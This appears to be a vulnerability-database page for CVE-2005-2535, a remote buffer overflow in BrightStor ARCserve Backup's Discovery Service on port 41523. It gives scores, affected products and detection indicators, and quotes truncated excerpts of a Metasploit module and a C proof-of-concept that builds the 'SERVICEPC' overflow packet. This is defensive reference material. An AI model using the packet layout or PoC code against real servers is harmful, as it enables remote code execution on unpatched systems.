CVE-2005-2535
published 2005-08-10CVE-2005-2535: Buffer overflow in the Discovery Service in BrightStor ARCserve Backup 9.0 through 11.1 allows remote attackers to execute arbitrary commands via a large…
PriorityP263high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
80.87%
99.6th percentile
Buffer overflow in the Discovery Service in BrightStor ARCserve Backup 9.0 through 11.1 allows remote attackers to execute arbitrary commands via a large packet to TCP port 41523, a different vulnerability than CVE-2005-0260.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| broadcom | arcserve_backup_2000 | — | — |
| broadcom | brightstor_arcserve_backup | — | — |
| broadcom | brightstor_arcserve_backup | — | — |
| broadcom | brightstor_arcserve_backup | — | — |
| broadcom | brightstor_arcserve_backup | — | — |
| broadcom | brightstor_arcserve_backup | — | — |
| broadcom | brightstor_arcserve_backup_hp | — | — |
| broadcom | brightstor_enterprise_backup | — | — |
| broadcom | brightstor_enterprise_backup | — | — |
| broadcom | brightstor_enterprise_backup | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
0x9b 'SERVICEPC' 0x18 [4-byte IP] 'SERVICEPC' 0x01 0x0c 0x6c 0x93 0xce 0x18 0x18 0x41 [overflow buffer]
- →Detect exploit attempts by monitoring for large TCP packets (>1024 bytes) to port 41523 that begin with the byte 0x9b followed by the ASCII string 'SERVICEPC'. ↗
- →The payload bad-char constraint is only null bytes (0x00); any other byte value may appear in the shellcode stream on TCP/41523. ↗
- →The PoC fills the overflow buffer with 0x41 ('A') bytes beyond the header; a buffer of 4096 bytes starting with 0x9b+SERVICEPC and padded with 0x41 is a strong indicator of exploitation. ↗
- ·The module author notes the vulnerability 'affects all known versions of the BrightStor product', so version-based filtering alone is insufficient for scoping detection. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
CA BrightStor Discovery Service - TCP Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2005-2535 CA BrightStor Discovery Service - TCP Overflow (Metasploit)
CA BrightStor Discovery Service - TCP Overflow (Metasploit)
---
##
# $Id: discovery_tcp.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'CA BrightStor Discovery Service TCP Overflow',
'Description' => %q{
This module exploits a vulnerability in the CA BrightStor
Discovery Service. This vulnerability occurs when a specific
type of request is sent to the TCP listener on port 41523.
This vulnerability was discovered by cybertronic[at]gmx.net
and affects all known versions of the BrightStor product.
This modu
Exploit-DB
CA BrightStor ARCserve Backup - Remote Buffer Overflow (PoC)
exploitdb·2005-02-12
CVE-2005-2535 CA BrightStor ARCserve Backup - Remote Buffer Overflow (PoC)
CA BrightStor ARCserve Backup - Remote Buffer Overflow (PoC)
---
/*
* BrightStor ARCserve Backup buffer overflow PoC
* [email protected]
*
*/
#include
#include
#include
#include
#include
#include
#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"
#define PORT 41523
void
start ( int s )
{
char buffer[4096];
bzero ( &buffer, 4096 );
memset ( buffer, 0x41, 50 );
buffer[0] = 0x9b;
buffer[1] = 0x53; //S
buffer[2] = 0x45; //E
buffer[3] = 0x52; //R
buffer[4] = 0x56; //V
buffer[5] = 0x49; //I
buffer[6] = 0x43; //C
buffer[7] = 0x45; //E
buffer[8] = 0x50; //P
buffer[9] = 0x43; //C
buffer[17] = 0x18;
buffer[21] = 0xc0;
buffer[22] = 0xa8;
buffer[23] = 0x02;
buffer[24] = 0x67;
buffer[25] = 0x53; //S
buffer[26] = 0
Metasploit
CA BrightStor Discovery Service TCP Overflow
metasploit
CA BrightStor Discovery Service TCP Overflow
CA BrightStor Discovery Service TCP Overflow
This module exploits a vulnerability in the CA BrightStor Discovery Service. This vulnerability occurs when a specific type of request is sent to the TCP listener on port 41523. This vulnerability was discovered by cybertronic[at]gmx.net and affects all known versions of the BrightStor product. This module is based on the 'cabrightstor_disco' exploit by HD Moore.
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.htmlhttp://archives.neohapsis.com/archives/bugtraq/2005-02/0141.htmlhttp://archives.neohapsis.com/archives/bugtraq/2005-02/0201.htmlhttp://secunia.com/advisories/14293http://www.kb.cert.org/vuls/id/966880http://www.osvdb.org/13814http://www.securityfocus.com/bid/12536http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?ID=32478https://exchange.xforce.ibmcloud.com/vulnerabilities/19320http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.htmlhttp://archives.neohapsis.com/archives/bugtraq/2005-02/0141.htmlhttp://archives.neohapsis.com/archives/bugtraq/2005-02/0201.htmlhttp://secunia.com/advisories/14293http://www.kb.cert.org/vuls/id/966880http://www.osvdb.org/13814http://www.securityfocus.com/bid/12536http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?ID=32478https://exchange.xforce.ibmcloud.com/vulnerabilities/19320
2005-08-10
Published